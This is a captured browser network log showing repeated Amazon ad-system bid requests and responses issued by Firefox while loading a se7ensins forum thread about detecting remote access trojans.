Remote address:

3.162.148.221:443

Request

GET /e/dtb/bid?src=600&u=https%3A%2F%2Fwww.se7ensins.com%2Fforums%2Fthreads%2Fhow-to-tell-if-youve-been-ratted.470346%2F&pr=https%3A%2F%2Fwww.google.com%2F&pid=xmqDhsTCqJPBC&cb=2&ws=1280x552&v=24.506.1519&t=543&slots=%5B%7B%22sd%22%3A%22browsi_adContainer_ai_0_ati_1_rc_0%22%2C%22s%22%3A%5B%22300x250%22%5D%2C%22sn%22%3A%22%2F15184186%2C2150491%2Fse7ensins_300x250_320x100_320x50_incontent%22%7D%5D&schain=1.0%2C1%21freestar.com%2C405%2C1%2C%2C%2C&sm=56e4f7ed-9634-4870-a3c9-f93d95366c2a&pubid=0ab198dd-b265-462a-ae36-74e163ad6159&gdpre=1&gdprc=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&gdprl=%7B%22status%22%3A%22tcfv2-success%22%7D&vm=%7B%22ids%22%3A%7B%22audigent%22%3A%22%257B%2522id%2522%253A%257B%2522hadronId%2522%253A%25220001yum0eabfdiledfja6b687lg8falbdjeell6ekeabackkc2jl%2522%257D%257D%22%2C%22id5%22%3A%22ID5*NQlRTNx5ZAOqP9LwA08SRcb8Mr7g4fEqc01CjXERBsSiBZ8tjCSWgJ-p-RSuQIqIodhIfg7Ia1JeC8s91KiYAaHJ1hOpW0boy51YONBr1jOh_BQOsbSLXytHAYBhLKF7od0OoZ_NbUtIj-xihNMF9qHtT5rjlhxelqvFrRUfFhejTj2EwoWIH32-rRGt8SHAog8u3wwyYUaDV24frJbb0w%22%2C%22pubcommon%22%3A%22a56c6a5c-fb27-451e-90d1-520be70f2f04%22%7D%7D&_c=1 HTTP/2.0
host: aax.amazon-adsystem.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
origin: https://www.se7ensins.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers

Response

HTTP/2.0 200

content-type: text/javascript;charset=UTF-8
content-length: 2244
access-control-allow-origin: https://www.se7ensins.com
access-control-allow-credentials: true
timing-allow-origin: *
date: Sun, 26 May 2024 02:06:56 GMT
server: Server
x-cache: Miss from cloudfront
via: 1.1 30b7c7ba62a58191e6dc0b2f231501a4.cloudfront.net (CloudFront)
x-amz-cf-pop: DUB56-P2
x-amz-cf-id: bQxwxRGDyxslIokELrS1ltiM_-MlcqJ4RIXU16sTCwwp9cgP1uXKaw==
GET

https://aax.amazon-adsystem.com/e/dtb/bid?src=600&u=https%3A%2F%2Fwww.se7ensins.com%2Fforums%2Fthreads%2Fhow-to-tell-if-youve-been-ratted.470346%2F&pr=https%3A%2F%2Fwww.google.com%2F&pid=xmqDhsTCqJPBC&cb=4&ws=1280x552&v=24.506.1519&t=543&slots=%5B%7B%22sd%22%3A%22browsi_adContainer_ai_2_ati_1_rc_0%22%2C%22s%22%3A%5B%22300x250%22%5D%2C%22sn%22%3A%22%2F15184186%2C2150491%2Fse7ensins_300x250_320x100_320x50_incontent%22%7D%5D&schain=1.0%2C1%21freestar.com%2C405%2C1%2C%2C%2C&sm=56e4f7ed-9634-4870-a3c9-f93d95366c2a&pubid=0ab198dd-b265-462a-ae36-74e163ad6159&gdpre=1&gdprc=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&gdprl=%7B%22status%22%3A%22tcfv2-success%22%7D&vm=%7B%22ids%22%3A%7B%22audigent%22%3A%22%257B%2522hadronId%2522%253A%25220001yum0eabfdiledfja6b687lg8falbdjeell6ekeabackkc2jl%2522%257D%22%2C%22id5%22%3A%22ID5*NQlRTNx5ZAOqP9LwA08SRcb8Mr7g4fEqc01CjXERBsSiBZ8tjCSWgJ-p-RSuQIqIodhIfg7Ia1JeC8s91KiYAaHJ1hOpW0boy51YONBr1jOh_BQOsbSLXytHAYBhLKF7od0OoZ_NbUtIj-xihNMF9qHtT5rjlhxelqvFrRUfFhejTj2EwoWIH32-rRGt8SHAog8u3wwyYUaDV24frJbb0w%22%2C%22pubcommon%22%3A%22a56c6a5c-fb27-451e-90d1-520be70f2f04%22%7D%7D&_c=1

firefox.exe

Remote address:

3.162.148.221:443

Request

GET /e/dtb/bid?src=600&u=https%3A%2F%2Fwww.se7ensins.com%2Fforums%2Fthreads%2Fhow-to-tell-if-youve-been-ratted.470346%2F&pr=https%3A%2F%2Fwww.google.com%2F&pid=xmqDhsTCqJPBC&cb=4&ws=1280x552&v=24.506.1519&t=543&slots=%5B%7B%22sd%22%3A%22browsi_adContainer_ai_2_ati_1_rc_0%22%2C%22s%22%3A%5B%22300x250%22%5D%2C%22sn%22%3A%22%2F15184186%2C2150491%2Fse7ensins_300x250_320x100_320x50_incontent%22%7D%5D&schain=1.0%2C1%21freestar.com%2C405%2C1%2C%2C%2C&sm=56e4f7ed-9634-4870-a3c9-f93d95366c2a&pubid=0ab198dd-b265-462a-ae36-74e163ad6159&gdpre=1&gdprc=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&gdprl=%7B%22status%22%3A%22tcfv2-success%22%7D&vm=%7B%22ids%22%3A%7B%22audigent%22%3A%22%257B%2522hadronId%2522%253A%25220001yum0eabfdiledfja6b687lg8falbdjeell6ekeabackkc2jl%2522%257D%22%2C%22id5%22%3A%22ID5*NQlRTNx5ZAOqP9LwA08SRcb8Mr7g4fEqc01CjXERBsSiBZ8tjCSWgJ-p-RSuQIqIodhIfg7Ia1JeC8s91KiYAaHJ1hOpW0boy51YONBr1jOh_BQOsbSLXytHAYBhLKF7od0OoZ_NbUtIj-xihNMF9qHtT5rjlhxelqvFrRUfFhejTj2EwoWIH32-rRGt8SHAog8u3wwyYUaDV24frJbb0w%22%2C%22pubcommon%22%3A%22a56c6a5c-fb27-451e-90d1-520be70f2f04%22%7D%7D&_c=1 HTTP/2.0
host: aax.amazon-adsystem.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
origin: https://www.se7ensins.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers

Response

HTTP/2.0 200

content-type: text/javascript;charset=UTF-8
content-length: 2244
access-control-allow-origin: https://www.se7ensins.com
access-control-allow-credentials: true
timing-allow-origin: *
date: Sun, 26 May 2024 02:06:55 GMT
server: Server
x-cache: Miss from cloudfront
via: 1.1 30b7c7ba62a58191e6dc0b2f231501a4.cloudfront.net (CloudFront)
x-amz-cf-pop: DUB56-P2
x-amz-cf-id: 8gW_PRpx1ztNK0TpVW7gXW_8WvscePvyjThOR5Sf1Cm3hxTXRWR6hQ==
GET

https://aax.amazon-adsystem.com/e/dtb/bid?src=600&u=https%3A%2F%2Fwww.se7ensins.com%2Fforums%2Fthreads%2Fhow-to-tell-if-youve-been-ratted.470346%2F&pr=https%3A%2F%2Fwww.google.com%2F&pid=xmqDhsTCqJPBC&cb=3&ws=1280x552&v=24.506.1519&t=543&slots=%5B%7B%22sd%22%3A%22browsi_adContainer_ai_1_ati_1_rc_0%22%2C%22s%22%3A%5B%22300x250%22%5D%2C%22sn%22%3A%22%2F15184186%2C2150491%2Fse7ensins_300x250_320x100_320x50_incontent%22%7D%5D&schain=1.0%2C1%21freestar.com%2C405%2C1%2C%2C%2C&sm=56e4f7ed-9634-4870-a3c9-f93d95366c2a&pubid=0ab198dd-b265-462a-ae36-74e163ad6159&gdpre=1&gdprc=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&gdprl=%7B%22status%22%3A%22tcfv2-success%22%7D&vm=%7B%22ids%22%3A%7B%22audigent%22%3A%22%257B%2522hadronId%2522%253A%25220001yum0eabfdiledfja6b687lg8falbdjeell6ekeabackkc2jl%2522%257D%22%2C%22id5%22%3A%22ID5*NQlRTNx5ZAOqP9LwA08SRcb8Mr7g4fEqc01CjXERBsSiBZ8tjCSWgJ-p-RSuQIqIodhIfg7Ia1JeC8s91KiYAaHJ1hOpW0boy51YONBr1jOh_BQOsbSLXytHAYBhLKF7od0OoZ_NbUtIj-xihNMF9qHtT5rjlhxelqvFrRUfFhejTj2EwoWIH32-rRGt8SHAog8u3wwyYUaDV24frJbb0w%22%2C%22pubcommon%22%3A%22a56c6a5c-fb27-451e-90d1-520be70f2f04%22%7D%7D&_c=1

firefox.exe

Remote address:

3.162.148.221:443

Request

GET /e/dtb/bid?src=600&u=https%3A%2F%2Fwww.se7ensins.com%2Fforums%2Fthreads%2Fhow-to-tell-if-youve-been-ratted.470346%2F&pr=https%3A%2F%2Fwww.google.com%2F&pid=xmqDhsTCqJPBC&cb=3&ws=1280x552&v=24.506.1519&t=543&slots=%5B%7B%22sd%22%3A%22browsi_adContainer_ai_1_ati_1_rc_0%22%2C%22s%22%3A%5B%22300x250%22%5D%2C%22sn%22%3A%22%2F15184186%2C2150491%2Fse7ensins_300x250_320x100_320x50_incontent%22%7D%5D&schain=1.0%2C1%21freestar.com%2C405%2C1%2C%2C%2C&sm=56e4f7ed-9634-4870-a3c9-f93d95366c2a&pubid=0ab198dd-b265-462a-ae36-74e163ad6159&gdpre=1&gdprc=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&gdprl=%7B%22status%22%3A%22tcfv2-success%22%7D&vm=%7B%22ids%22%3A%7B%22audigent%22%3A%22%257B%2522hadronId%2522%253A%25220001yum0eabfdiledfja6b687lg8falbdjeell6ekeabackkc2jl%2522%257D%22%2C%22id5%22%3A%22ID5*NQlRTNx5ZAOqP9LwA08SRcb8Mr7g4fEqc01CjXERBsSiBZ8tjCSWgJ-p-RSuQIqIodhIfg7Ia1JeC8s91KiYAaHJ1hOpW0boy51YONBr1jOh_BQOsbSLXytHAYBhLKF7od0OoZ_NbUtIj-xihNMF9qHtT5rjlhxelqvFrRUfFhejTj2EwoWIH32-rRGt8SHAog8u3wwyYUaDV24frJbb0w%22%2C%22pubcommon%22%3A%22a56c6a5c-fb27-451e-90d1-520be70f2f04%22%7D%7D&_c=1 HTTP/2.0
host: aax.amazon-adsystem.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
origin: https://www.se7ensins.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers

Response

HTTP/2.0 200

content-type: text/javascript;charset=UTF-8
content-length: 2244
access-control-allow-origin: https://www.se7ensins.com
access-control-allow-credentials: true
timing-allow-origin: *
date: Sun, 26 May 2024 02:06:56 GMT
server: Server
x-cache: Miss from cloudfront
via: 1.1 30b7c7ba62a58191e6dc0b2f231501a4.cloudfront.net (CloudFront)
x-amz-cf-pop: DUB56-P2
x-amz-cf-id: g68yS4-gY55QPW2FtyBKp_fwp4NwS0EONje0mxGmErEX1vLZ-zHPUA==
GET

https://aax.amazon-adsystem.com/e/dtb/bid?src=600&u=https%3A%2F%2Fwww.se7ensins.com%2Fforums%2Fthreads%2Fhow-to-tell-if-youve-been-ratted.470346%2F&pr=https%3A%2F%2Fwww.google.com%2F&pid=xmqDhsTCqJPBC&cb=5&ws=1280x552&v=24.506.1519&t=2000&slots=%5B%7B%22id%22%3A%22aps_springserve_outstream_ron%22%2C%22mt%22%3A%22v%22%7D%5D&schain=1.0%2C1%21freestar.com%2C405%2C1%2C%2C%2C&sm=56e4f7ed-9634-4870-a3c9-f93d95366c2a&pubid=0ab198dd-b265-462a-ae36-74e163ad6159&gdpre=1&gdprc=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&gdprl=%7B%22status%22%3A%22tcfv2-success%22%7D&vm=%7B%22ids%22%3A%7B%22audigent%22%3A%22%257B%2522hadronId%2522%253A%25220001yum0eabfdiledfja6b687lg8falbdjeell6ekeabackkc2jl%2522%257D%22%2C%22id5%22%3A%22ID5*NQlRTNx5ZAOqP9LwA08SRcb8Mr7g4fEqc01CjXERBsSiBZ8tjCSWgJ-p-RSuQIqIodhIfg7Ia1JeC8s91KiYAaHJ1hOpW0boy51YONBr1jOh_BQOsbSLXytHAYBhLKF7od0OoZ_NbUtIj-xihNMF9qHtT5rjlhxelqvFrRUfFhejTj2EwoWIH32-rRGt8SHAog8u3wwyYUaDV24frJbb0w%22%2C%22pubcommon%22%3A%22a56c6a5c-fb27-451e-90d1-520be70f2f04%22%7D%7D&_c=1

firefox.exe

Remote address:

3.162.148.221:443

Request

